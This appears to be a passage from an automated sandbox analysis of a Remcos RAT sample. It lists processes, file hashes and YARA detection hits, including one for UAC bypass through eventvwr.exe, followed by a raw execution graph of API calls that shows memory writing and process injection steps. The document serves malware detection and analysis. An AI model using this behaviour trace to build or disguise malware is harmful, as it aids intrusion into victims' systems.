                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000003.1544796115.00000000030F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000D.00000002.1544875257.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Target ID:14
                                                                Start time:02:13:37
                                                                Start date:26/11/2024
                                                                Path:C:\Users\Public\Libraries\Ntmftfld.PIF
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\Public\Libraries\Ntmftfld.PIF"
                                                                Imagebase:0x400000
                                                                File size:1'566'208 bytes
                                                                MD5 hash:06A72BA35AAFF1B3AB0EA4D3E2E65451
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                Target ID:15
                                                                Start time:02:13:37
                                                                Start date:26/11/2024
                                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\System32\colorcpl.exe
                                                                Imagebase:0xd40000
                                                                File size:86'528 bytes
                                                                MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.1616189351.000000000305C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.1616135041.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000003.1616096302.0000000003062000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.1617014423.0000000007090000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 0000000F.00000002.1616232247.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                Reputation:moderate
                                                                Has exited:true

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:14.9%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:7%
                                                                  Total number of Nodes:2000
                                                                  Total number of Limit Nodes:20
                                                                  execution_graph 32435 2edd2fc 32445 2eb656c 32435->32445 32439 2edd32a 32450 2edc360 timeSetEvent 32439->32450 32441 2edd334 32442 2edd342 GetMessageA 32441->32442 32443 2edd336 TranslateMessage DispatchMessageA 32442->32443 32444 2edd352 32442->32444 32443->32442 32446 2eb6577 32445->32446 32451 2eb4198 32446->32451 32449 2eb42ac SysFreeString SysReAllocStringLen SysAllocStringLen 32449->32439 32450->32441 32452 2eb41de 32451->32452 32453 2eb4257 32452->32453 32457 2eb43e8 32452->32457 32465 2eb4130 32453->32465 32456 2eb4419 32470 2eb435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32456->32470 32457->32456 32461 2eb442a 32457->32461 32459 2eb4423 32459->32461 32460 2eb446f FreeLibrary 32460->32461 32461->32460 32462 2eb4493 32461->32462 32463 2eb449c 32462->32463 32464 2eb44a2 ExitProcess 32462->32464 32463->32464 32466 2eb4173 32465->32466 32467 2eb4140 32465->32467 32466->32449 32467->32466 32471 2eb5868 32467->32471 32475 2eb15cc 32467->32475 32470->32459 32472 2eb5878 GetModuleFileNameA 32471->32472 32473 2eb5894 32471->32473 32479 2eb5acc GetModuleFileNameA RegOpenKeyExA 32472->32479 32473->32467 32498 2eb1560 32475->32498 32477 2eb15d4 VirtualAlloc 32478 2eb15eb 32477->32478 32478->32467 32480 2eb5b4f 32479->32480 32481 2eb5b0f RegOpenKeyExA 32479->32481 32497 2eb5908 12 API calls 32480->32497 32481->32480 32482 2eb5b2d RegOpenKeyExA 32481->32482 32482->32480 32484 2eb5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32482->32484 32487 2eb5cf2 32484->32487 32491 2eb5c0f 32484->32491 32485 2eb5b74 RegQueryValueExA 32486 2eb5b94 RegQueryValueExA 32485->32486 32488 2eb5bb2 RegCloseKey 32485->32488 32486->32488 32487->32473 32488->32473 32490 2eb5c1f lstrlenA 32492 2eb5c37 32490->32492 32491->32487 32491->32490 32492->32487 32493 2eb5c5c lstrcpynA LoadLibraryExA 32492->32493 32494 2eb5c84 32492->32494 32493->32494 32494->32487 32495 2eb5c8e lstrcpynA LoadLibraryExA 32494->32495 32495->32487 32496 2eb5cc0 lstrcpynA LoadLibraryExA 32495->32496 32496->32487 32497->32485 32499 2eb1500 32498->32499 32499->32477 32500 2ed7078 33321 2eb4860 32500->33321 33322 2eb4871 33321->33322 33323 2eb48ae 33322->33323 33324 2eb4897 33322->33324 33339 2eb45a0 33323->33339 33330 2eb4bcc 33324->33330 33327 2eb48a4 33328 2eb48df 33327->33328 33344 2eb4530 33327->33344 33331 2eb4bd9 33330->33331 33338 2eb4c09 33330->33338 33333 2eb4c02 33331->33333 33334 2eb4be5 33331->33334 33335 2eb45a0 11 API calls 33333->33335 33350 2eb2c44 11 API calls 33334->33350 33335->33338 33336 2eb4bf3 33336->33327 33351 2eb44dc 33338->33351 33340 2eb45c8 33339->33340 33341 2eb45a4 33339->33341 33340->33327 33356 2eb2c10 11 API calls 33341->33356 33343 2eb45b1 33343->33327 33345 2eb4544 33344->33345 33346 2eb4534 33344->33346 33347 2eb4572 33345->33347 33357 2eb2c2c 11 API calls 33345->33357 33346->33345 33348 2eb45a0 11 API calls 33346->33348 33347->33328 33348->33345 33350->33336 33352 2eb44e2 33351->33352 33354 2eb44fd 33351->33354 33352->33354 33355 2eb2c2c 11 API calls 33352->33355 33354->33336 33355->33354 33356->33343 33357->33347 33358 2eb4edc 33359 2eb4ee9 33358->33359 33363 2eb4ef0 33358->33363 33364 2eb4c38 33359->33364 33370 2eb4c50 33363->33370 33365 2eb4c4c 33364->33365 33366 2eb4c3c SysAllocStringLen 33364->33366 33365->33363 33366->33365 33367 2eb4c30 33366->33367 33368 2eb4f3c 33367->33368 33369 2eb4f26 SysAllocStringLen 33367->33369 33368->33363 33369->33367 33369->33368 33371 2eb4c5c 33370->33371 33372 2eb4c56 SysFreeString 33370->33372 33372->33371 33373 2eb1c6c 33374 2eb1c7c 33373->33374 33375 2eb1d04 33373->33375 33376 2eb1c89 33374->33376 33377 2eb1cc0 33374->33377 33378 2eb1f58 33375->33378 33379 2eb1d0d 33375->33379 33380 2eb1c94 33376->33380 33421 2eb1724 33376->33421 33383 2eb1724 10 API calls 33377->33383 33381 2eb1fec 33378->33381 33385 2eb1f68 33378->33385 33386 2eb1fac 33378->33386 33382 2eb1e24 33379->33382 33392 2eb1d25 33379->33392 33399 2eb1e7c 33382->33399 33400 2eb1e55 Sleep 33382->33400 33409 2eb1e95 33382->33409 33393 2eb1cd7 33383->33393 33389 2eb1724 10 API calls 33385->33389 33388 2eb1fb2 33386->33388 33394 2eb1724 10 API calls 33386->33394 33387 2eb1d2c 33408 2eb1f82 33389->33408 33390 2eb1724 10 API calls 33406 2eb1f2c 33390->33406 33391 2eb1d48 33401 2eb1d79 Sleep 33391->33401 33413 2eb1d9c 33391->33413 33392->33387 33392->33391 33397 2eb1dfc 33392->33397 33407 2eb1a8c 8 API calls 33393->33407 33411 2eb1cfd 33393->33411 33412 2eb1fc1 33394->33412 33395 2eb1cb9 33396 2eb1ca1 33396->33395 33445 2eb1a8c 33396->33445 33402 2eb1724 10 API calls 33397->33402 33398 2eb1fa7 33399->33390 33399->33409 33400->33399 33403 2eb1e6f Sleep 33400->33403 33404 2eb1d91 Sleep 33401->33404 33401->33413 33414 2eb1e05 33402->33414 33403->33382 33404->33391 33405 2eb1e1d 33406->33409 33415 2eb1a8c 8 API calls 33406->33415 33407->33411 33408->33398 33416 2eb1a8c 8 API calls 33408->33416 33412->33398 33419 2eb1a8c 8 API calls 33412->33419 33414->33405 33417 2eb1a8c 8 API calls 33414->33417 33418 2eb1f50 33415->33418 33416->33398 33417->33405 33420 2eb1fe4 33419->33420 33422 2eb1968 33421->33422 33423 2eb173c 33421->33423 33424 2eb1938 33422->33424 33425 2eb1a80 33422->33425 33432 2eb174e 33423->33432 33436 2eb17cb Sleep 33423->33436 33431 2eb1947 Sleep 33424->33431 33437 2eb1986 33424->33437 33427 2eb1a89 33425->33427 33428 2eb1684 VirtualAlloc 33425->33428 33426 2eb175d 33426->33396 33427->33396 33429 2eb16bf 33428->33429 33430 2eb16af 33428->33430 33429->33396 33462 2eb1644 33430->33462 33435 2eb195d Sleep 33431->33435 33431->33437 33432->33426 33433 2eb182c 33432->33433 33438 2eb180a Sleep 33432->33438 33443 2eb15cc VirtualAlloc 33433->33443 33444 2eb1838 33433->33444 33435->33424 33436->33432 33439 2eb17e4 Sleep 33436->33439 33440 2eb19a4 33437->33440 33441 2eb15cc VirtualAlloc 33437->33441 33438->33433 33442 2eb1820 Sleep 33438->33442 33439->33423 33440->33396 33441->33440 33442->33432 33443->33444 33444->33396 33446 2eb1b6c 33445->33446 33447 2eb1aa1 33445->33447 33448 2eb16e8 33446->33448 33451 2eb1aa7 33446->33451 33450 2eb1b13 Sleep 33447->33450 33447->33451 33449 2eb1c66 33448->33449 33453 2eb1644 2 API calls 33448->33453 33449->33395 33450->33451 33454 2eb1b2d Sleep 33450->33454 33452 2eb1ab0 33451->33452 33455 2eb1b4b Sleep 33451->33455 33458 2eb1b81 33451->33458 33452->33395 33456 2eb16f5 VirtualFree 33453->33456 33454->33447 33457 2eb1b61 Sleep 33455->33457 33455->33458 33459 2eb170d 33456->33459 33457->33451 33460 2eb1c00 VirtualFree 33458->33460 33461 2eb1ba4 33458->33461 33459->33395 33460->33395 33461->33395 33463 2eb1681 33462->33463 33464 2eb164d 33462->33464 33463->33429 33464->33463 33465 2eb164f Sleep 33464->33465 33466 2eb1664 33465->33466 33466->33463 33467 2eb1668 Sleep 33466->33467 33467->33464 33468 2edc354 33471 2ecf7cc 33468->33471 33472 2ecf7d4 33471->33472 33472->33472 33473 2ecf7db 33472->33473 35889 2ec88c8 LoadLibraryW 33473->35889 33475 2ecf7f5 35894 2eb2ee0 QueryPerformanceCounter 33475->35894 33477 2ecf7fa 33478 2ecf804 InetIsOffline 33477->33478 33479 2ecf80e 33478->33479 33480 2ecf81f 33478->33480 33481 2eb4530 11 API calls 33479->33481 33482 2eb4530 11 API calls 33480->33482 33483 2ecf81d 33481->33483 33482->33483 33484 2eb4860 11 API calls 33483->33484 33485 2ecf84c 33484->33485 33486 2ecf854 33485->33486 33487 2ecf85e 33486->33487 35897 2eb47ec 33487->35897 33489 2ecf877 33490 2ecf87f 33489->33490 33491 2ecf889 33490->33491 35912 2ec89e0 33491->35912 33494 2eb4860 11 API calls 33495 2ecf8b0 33494->33495 33496 2ecf8b8 33495->33496 33497 2ecf8c2 33496->33497 33498 2eb47ec 11 API calls 33497->33498 33499 2ecf8db 33498->33499 33500 2ecf8e3 33499->33500 33501 2ecf8ed 33500->33501 33502 2ec89e0 19 API calls 33501->33502 33503 2ecf8f6 33502->33503 33504 2eb4860 11 API calls 33503->33504 33505 2ecf914 33504->33505 33506 2ecf91c 33505->33506 35924 2eb46d4 33506->35924 35926 2ec8284 35889->35926 35891 2ec8901 35937 2ec7d88 35891->35937 35895 2eb2ef8 GetTickCount 35894->35895 35896 2eb2eed 35894->35896 35895->33477 35896->33477 35898 2eb4851 35897->35898 35899 2eb47f0 35897->35899 35900 2eb47f8 35899->35900 35901 2eb4530 35899->35901 35900->35898 35903 2eb4807 35900->35903 35904 2eb4530 11 API calls 35900->35904 35905 2eb45a0 11 API calls 35901->35905 35907 2eb4544 35901->35907 35902 2eb4572 35902->33489 35906 2eb45a0 11 API calls 35903->35906 35904->35903 35905->35907 35909 2eb4821 35906->35909 35907->35902 35974 2eb2c2c 11 API calls 35907->35974 35910 2eb4530 11 API calls 35909->35910 35911 2eb484d 35910->35911 35911->33489 35913 2ec89f4 35912->35913 35914 2ec81dc 17 API calls 35913->35914 35915 2ec8a2d 35914->35915 35916 2ec8284 15 API calls 35915->35916 35917 2ec8a46 35916->35917 35918 2ec7d88 18 API calls 35917->35918 35919 2ec8aa5 35918->35919 35975 2ec8348 35919->35975 35922 2eb4500 11 API calls 35923 2ec8ace 35922->35923 35923->33494 35925 2eb46da 35924->35925 35925->35925 35927 2eb4530 11 API calls 35926->35927 35928 2ec82a9 35927->35928 35951 2ec799c 35928->35951 35931 2eb47ec 11 API calls 35932 2ec82c3 35931->35932 35933 2ec82cb GetModuleHandleW GetProcAddress GetProcAddress 35932->35933 35934 2ec82fe 35933->35934 35957 2eb4500 35934->35957 35938 2eb4530 11 API calls 35937->35938 35939 2ec7dad 35938->35939 35940 2ec799c 12 API calls 35939->35940 35941 2ec7dba 35940->35941 35942 2eb47ec 11 API calls 35941->35942 35943 2ec7dca 35942->35943 35963 2ec81dc 35943->35963 35946 2ec8284 15 API calls 35947 2ec7de3 NtWriteVirtualMemory 35946->35947 35948 2ec7e0f 35947->35948 35949 2eb4500 11 API calls 35948->35949 35950 2ec7e1c FreeLibrary 35949->35950 35950->33475 35952 2ec79ad 35951->35952 35953 2eb4bcc 11 API calls 35952->35953 35955 2ec79bd 35953->35955 35954 2ec7a29 35954->35931 35955->35954 35961 2ebbacc CharNextA 35955->35961 35959 2eb4506 35957->35959 35958 2eb452c 35958->35891 35959->35958 35962 2eb2c2c 11 API calls 35959->35962 35961->35955 35962->35959 35964 2eb4530 11 API calls 35963->35964 35965 2ec81ff 35964->35965 35966 2ec799c 12 API calls 35965->35966 35967 2ec820c 35966->35967 35968 2ec8214 GetModuleHandleA 35967->35968 35969 2ec8284 15 API calls 35968->35969 35970 2ec8225 GetModuleHandleA 35969->35970 35971 2ec8243 35970->35971 35972 2eb44dc 11 API calls 35971->35972 35973 2ec7ddd 35972->35973 35973->35946 35974->35902 35976 2eb4530 11 API calls 35975->35976 35977 2ec836b 35976->35977 35978 2eb4860 11 API calls 35977->35978 35979 2ec838a 35978->35979 35980 2ec81dc 17 API calls 35979->35980 35981 2ec839d 35980->35981 35982 2ec8284 15 API calls 35981->35982 35983 2ec83a3 FlushInstructionCache 35982->35983 35984 2ec83c9 35983->35984 35985 2eb44dc 11 API calls 35984->35985 35986 2ec83d1 35985->35986 35986->35922 35987 2ed3e16 35988 2eb4860 11 API calls 35987->35988 35989 2ed3e37 35988->35989 35990 2ed3e4f 35989->35990 35991 2eb47ec 11 API calls 35990->35991 35992 2ed3e6e 35991->35992 35993 2ed3e86 35992->35993 35994 2ec89e0 19 API calls 35993->35994 35995 2ed3e92 35994->35995 37533 2ecf098 35995->37533 35998 2eb4860 11 API calls 35999 2ed3ee4 35998->35999 36000 2ed3eef 35999->36000 36001 2ed3efb 36000->36001 36002 2eb4860 11 API calls 36001->36002 36003 2ed3f1c 36002->36003 36004 2ed3f27 36003->36004 36005 2ed3f34 36004->36005 36006 2eb47ec 11 API calls 36005->36006 36007 2ed3f53 36006->36007 36008 2ed3f6b 36007->36008 36009 2ec89e0 19 API calls 36008->36009 36010 2ed3f77 36009->36010 36011 2eb4860 11 API calls 36010->36011 36012 2ed3f98 36011->36012 36013 2ed3fa3 36012->36013 36014 2ed3fb0 36013->36014 36015 2eb47ec 11 API calls 36014->36015 36016 2ed3fcf 36015->36016 36017 2ed3fe7 36016->36017 36018 2ec89e0 19 API calls 36017->36018 36019 2ed3ff3 36018->36019 36020 2eb4860 11 API calls 36019->36020 36021 2ed4014 36020->36021 36022 2ed401f 36021->36022 36023 2ed402c 36022->36023 36024 2eb47ec 11 API calls 36023->36024 36025 2ed404b 36024->36025 36026 2ed4056 36025->36026 36027 2ed4063 36026->36027 36028 2ec89e0 19 API calls 36027->36028 36029 2ed406f 36028->36029 37540 2ece35c 36029->37540 36032 2ed4095 36033 2ed40a6 36032->36033 37545 2ecdc90 36033->37545 36036 2eb4860 11 API calls 36037 2ed40f5 36036->36037 36038 2ed4100 36037->36038 36039 2eb47ec 11 API calls 36038->36039 36040 2ed412c 36039->36040 36041 2ed4137 36040->36041 36042 2ec89e0 19 API calls 36041->36042 36043 2ed4150 36042->36043 36044 2eb4860 11 API calls 36043->36044 36045 2ed4171 36044->36045 36046 2eb47ec 11 API calls 36045->36046 36047 2ed41a8 36046->36047 36048 2ed41b3 36047->36048 36049 2ec89e0 19 API calls 36048->36049 36050 2ed41cc 36049->36050 36051 2ec88c8 20 API calls 36050->36051 36052 2ed41d1 36051->36052 36053 2ed41db 36052->36053 37560 2ece67c 36053->37560 36056 2eb4860 11 API calls 36057 2ed421b 36056->36057 36058 2ed4233 36057->36058 36059 2eb47ec 11 API calls 36058->36059 36060 2ed4252 36059->36060 36061 2ed425d 36060->36061 36062 2ec89e0 19 API calls 36061->36062 36063 2ed4276 Sleep 36062->36063 36064 2eb4860 11 API calls 36063->36064 36065 2ed42a1 36064->36065 36066 2ed42b9 36065->36066 36067 2eb47ec 11 API calls 36066->36067 36068 2ed42d8 36067->36068 36069 2ed42e3 36068->36069 36070 2eb46d4 36069->36070 36071 2ed42f0 36070->36071 36072 2ec89e0 19 API calls 36071->36072 36073 2ed42fc 36072->36073 36074 2eb4860 11 API calls 36073->36074 36075 2ed431d 36074->36075 37699 2eb49a0 36075->37699 36078 2eb46d4 36079 2ed4335 36078->36079 36080 2eb47ec 11 API calls 36079->36080 36081 2ed4354 36080->36081 36082 2ed435f 36081->36082 36083 2eb46d4 36082->36083 36084 2ed436c 36083->36084 36085 2ec89e0 19 API calls 36084->36085 36086 2ed4378 36085->36086 36087 2eb4860 11 API calls 36086->36087 36088 2ed4399 36087->36088 36089 2ed43a4 36088->36089 36090 2eb46d4 36089->36090 36091 2ed43b1 36090->36091 36092 2eb47ec 11 API calls 36091->36092 36093 2ed43d0 36092->36093 36094 2ed43db 36093->36094 36095 2ed43e8 36094->36095 36096 2ec89e0 19 API calls 36095->36096 36097 2ed43f4 36096->36097 36098 2ed4403 36097->36098 36099 2eb4860 11 API calls 36098->36099 36100 2ed4424 36099->36100 36101 2eb49a0 36100->36101 36102 2ed442f 36101->36102 36103 2eb47ec 11 API calls 36102->36103 36104 2ed445b 36103->36104 36105 2ed4466 36104->36105 36106 2ed4473 36105->36106 36107 2ec89e0 19 API calls 36106->36107 36108 2ed447f 36107->36108 36109 2eb4860 11 API calls 36108->36109 36110 2ed44a0 36109->36110 36111 2eb49a0 36110->36111 36112 2ed44ab 36111->36112 36113 2eb46d4 36112->36113 36114 2ed44b8 36113->36114 36115 2eb47ec 11 API calls 36114->36115 36116 2ed44d7 36115->36116 36117 2ed44e2 36116->36117 36118 2ec89e0 19 API calls 36117->36118 36119 2ed44fb 36118->36119 36120 2eb4860 11 API calls 36119->36120 36121 2ed451c 36120->36121 36122 2ed4527 36121->36122 36123 2eb46d4 36122->36123 36124 2ed4534 36123->36124 36125 2eb47ec 11 API calls 36124->36125 36126 2ed4553 36125->36126 36127 2eb49a0 36126->36127 36128 2ed455e 36127->36128 36129 2ec89e0 19 API calls 36128->36129 36130 2ed4577 36129->36130 36131 2eb4860 11 API calls 36130->36131 36132 2ed4598 36131->36132 36133 2eb47ec 11 API calls 36132->36133 36134 2ed45bc 36133->36134 36135 2ed45c7 36134->36135 37701 2ec895c LoadLibraryW 36135->37701 36138 2eb4860 11 API calls 36139 2ed45f5 36138->36139 36140 2eb47ec 11 API calls 36139->36140 36141 2ed4619 36140->36141 36142 2eb49a0 36141->36142 36143 2ed4624 36142->36143 36144 2ed462a 36143->36144 36145 2ec895c 21 API calls 36144->36145 36146 2ed4631 36145->36146 36147 2ec88c8 20 API calls 36146->36147 36148 2ed4636 36147->36148 36149 2eb4860 11 API calls 36148->36149 36150 2ed4657 36149->36150 36151 2ed466f 36150->36151 36152 2eb47ec 11 API calls 36151->36152 36153 2ed468e 36152->36153 36154 2ed4699 36153->36154 36155 2ed46a6 36154->36155 36156 2ec89e0 19 API calls 36155->36156 36157 2ed46b2 36156->36157 36158 2eb4860 11 API calls 36157->36158 36159 2ed46d3 36158->36159 36160 2ed46eb 36159->36160 36161 2eb47ec 11 API calls 36160->36161 36162 2ed470a 36161->36162 36163 2ed4715 36162->36163 36164 2ed4722 36163->36164 36165 2ec89e0 19 API calls 36164->36165 36166 2ed472e 36165->36166 36167 2eb4860 11 API calls 36166->36167 36168 2ed474f 36167->36168 36169 2ed4767 36168->36169 36170 2eb47ec 11 API calls 36169->36170 36171 2ed4786 36170->36171 36172 2ed479e 36171->36172 36173 2ec89e0 19 API calls 36172->36173 36174 2ed47aa 36173->36174 36175 2ece35c 11 API calls 36174->36175 36176 2ed47bf 36175->36176 36177 2ed47e1 36176->36177 36178 2ed47f9 36177->36178 36179 2ecdc90 17 API calls 36178->36179 36180 2ed4805 36179->36180 36181 2ec88c8 20 API calls 36180->36181 36182 2ed480a 36181->36182 36183 2ecf098 11 API calls 36182->36183 36184 2ed481a 36183->36184 36185 2eb47ec 11 API calls 36184->36185 36186 2ed4830 36185->36186 36187 2ed4847 36186->36187 36188 2eb4860 11 API calls 36187->36188 36189 2ed4868 36188->36189 36190 2ed4873 36189->36190 36191 2ed4880 36190->36191 36192 2eb47ec 11 API calls 36191->36192 36193 2ed489f 36192->36193 36194 2ed48aa 36193->36194 36195 2ec89e0 19 API calls 36194->36195 36196 2ed48c3 36195->36196 36197 2eb4860 11 API calls 36196->36197 36198 2ed48e4 36197->36198 36199 2eb46d4 36198->36199 36200 2ed48fc 36199->36200 36201 2eb47ec 11 API calls 36200->36201 36202 2ed491b 36201->36202 36203 2ed4926 36202->36203 36204 2ed4933 36203->36204 36205 2ec89e0 19 API calls 36204->36205 36206 2ed493f 36205->36206 36207 2eb4860 11 API calls 36206->36207 36208 2ed4960 36207->36208 36209 2ed496b 36208->36209 36210 2eb47ec 11 API calls 36209->36210 36211 2ed4997 36210->36211 36212 2ed49a2 36211->36212 36213 2ec89e0 19 API calls 36212->36213 36214 2ed49bb 36213->36214 36215 2ec88c8 20 API calls 36214->36215 36216 2ed49c0 36215->36216 36217 2eb4860 11 API calls 36216->36217 36218 2ed49e1 36217->36218 36219 2ed49f9 36218->36219 36220 2eb47ec 11 API calls 36219->36220 36221 2ed4a18 36220->36221 36222 2ed4a23 36221->36222 36223 2ed4a30 36222->36223 36224 2ec89e0 19 API calls 36223->36224 36225 2ed4a3c 36224->36225 36226 2eb4860 11 API calls 36225->36226 36227 2ed4a5d 36226->36227 36228 2eb47ec 11 API calls 36227->36228 36229 2ed4a94 36228->36229 36230 2ec89e0 19 API calls 36229->36230 36231 2ed4ab8 36230->36231 36232 2eb4860 11 API calls 36231->36232 36233 2ed4ad9 36232->36233 36234 2ed4af1 36233->36234 36235 2eb47ec 11 API calls 36234->36235 36236 2ed4b10 36235->36236 36237 2ed4b28 36236->36237 36238 2ec89e0 19 API calls 36237->36238 36239 2ed4b34 36238->36239 36240 2eb4860 11 API calls 36239->36240 36241 2ed4b55 36240->36241 36242 2ed4b60 36241->36242 36243 2eb47ec 11 API calls 36242->36243 36244 2ed4b8c 36243->36244 36245 2ed4b97 36244->36245 36246 2ec89e0 19 API calls 36245->36246 36247 2ed4bb0 36246->36247 36248 2ec88c8 20 API calls 36247->36248 36249 2ed4bb5 36248->36249 36250 2ece35c 11 API calls 36249->36250 36251 2ed4bca 36250->36251 36252 2ed4bec 36251->36252 36253 2ed4c04 36252->36253 36254 2ecdc90 17 API calls 36253->36254 36255 2ed4c10 36254->36255 36256 2eb4860 11 API calls 36255->36256 36257 2ed4c31 36256->36257 36258 2ed4c3c 36257->36258 36259 2ed4c49 36258->36259 36260 2eb47ec 11 API calls 36259->36260 36261 2ed4c68 36260->36261 36262 2ed4c73 36261->36262 36263 2ed4c80 36262->36263 36264 2ec89e0 19 API calls 36263->36264 36265 2ed4c8c 36264->36265 36266 2eb4860 11 API calls 36265->36266 36267 2ed4cad 36266->36267 36268 2ed4cb8 36267->36268 36269 2ed4cc5 36268->36269 36270 2eb47ec 11 API calls 36269->36270 36271 2ed4ce4 36270->36271 36272 2ed4cef 36271->36272 36273 2ed4cfc 36272->36273 36274 2ec89e0 19 API calls 36273->36274 36275 2ed4d08 36274->36275 36276 2eb4860 11 API calls 36275->36276 36277 2ed4d29 36276->36277 36278 2ed4d34 36277->36278 36279 2ed4d41 36278->36279 36280 2eb47ec 11 API calls 36279->36280 36281 2ed4d60 36280->36281 36282 2ed4d6b 36281->36282 36283 2ed4d78 36282->36283 36284 2ec89e0 19 API calls 36283->36284 36285 2ed4d84 36284->36285 36286 2eb4860 11 API calls 36285->36286 36287 2ed4da5 36286->36287 36288 2ed4db0 36287->36288 36289 2ed4dbd 36288->36289 36290 2eb47ec 11 API calls 36289->36290 36291 2ed4ddc 36290->36291 36292 2ed4df4 36291->36292 36293 2ec89e0 19 API calls 36292->36293 36294 2ed4e00 36293->36294 36295 2eb4860 11 API calls 36294->36295 36296 2ed4e21 36295->36296 36297 2ed4e2c 36296->36297 36298 2ed4e39 36297->36298 36299 2eb47ec 11 API calls 36298->36299 36300 2ed4e58 36299->36300 36301 2ed4e63 36300->36301 36302 2ed4e70 36301->36302 36303 2ec89e0 19 API calls 36302->36303 36304 2ed4e7c 36303->36304 36305 2eb4860 11 API calls 36304->36305 36306 2ed4e9d 36305->36306 36307 2ed4ea8 36306->36307 36308 2ed4eb5 36307->36308 36309 2eb47ec 11 API calls 36308->36309 36310 2ed4ed4 36309->36310 36311 2ed4edf 36310->36311 36312 2ed4eec 36311->36312 36313 2ec89e0 19 API calls 36312->36313 36314 2ed4ef8 36313->36314 36315 2eb4860 11 API calls 36314->36315 36316 2ed4f19 36315->36316 36317 2ed4f24 36316->36317 36318 2ed4f31 36317->36318 36319 2eb47ec 11 API calls 36318->36319 36320 2ed4f50 36319->36320 36321 2ec89e0 19 API calls 36320->36321 36322 2ed4f74 36321->36322 36323 2eb4860 11 API calls 36322->36323 36324 2ed4f95 36323->36324 36325 2ed4fad 36324->36325 36326 2eb47ec 11 API calls 36325->36326 36327 2ed4fcc 36326->36327 36328 2ed4fe4 36327->36328 36329 2ec89e0 19 API calls 36328->36329 36330 2ed4ff0 36329->36330 36331 2ec88c8 20 API calls 36330->36331 36332 2ed4ff5 36331->36332 36333 2eb4860 11 API calls 36332->36333 36334 2ed5016 36333->36334 36335 2eb47ec 11 API calls 36334->36335 36336 2ed504d 36335->36336 36337 2ec89e0 19 API calls 36336->36337 36338 2ed5071 36337->36338 36339 2eb4860 11 API calls 36338->36339 36340 2ed5092 36339->36340 36341 2ed50aa 36340->36341 36342 2eb47ec 11 API calls 36341->36342 36343 2ed50c9 36342->36343 36344 2ed50e1 36343->36344 36345 2ec89e0 19 API calls 36344->36345 36346 2ed50ed Sleep 36345->36346 36347 2eb4860 11 API calls 36346->36347 36348 2ed5118 36347->36348 36349 2ed5123 36348->36349 36350 2ed5130 36349->36350 36351 2eb47ec 11 API calls 36350->36351 36352 2ed514f 36351->36352 36353 2ed5167 36352->36353 36354 2ec89e0 19 API calls 36353->36354 36355 2ed5173 36354->36355 36356 2eb4860 11 API calls 36355->36356 36357 2ed5194 36356->36357 36358 2ed519f 36357->36358 36359 2ed51ac 36358->36359 36360 2eb47ec 11 API calls 36359->36360 36361 2ed51cb 36360->36361 36362 2ed51e3 36361->36362 36363 2ec89e0 19 API calls 36362->36363 36364 2ed51ef 36363->36364 36365 2eb4860 11 API calls 36364->36365 36366 2ed5210 36365->36366 36367 2ed521b 36366->36367 36368 2ed5228 36367->36368 36369 2eb47ec 11 API calls 36368->36369 36370 2ed5247 36369->36370 36371 2ed525f 36370->36371 36372 2ec89e0 19 API calls 36371->36372 36373 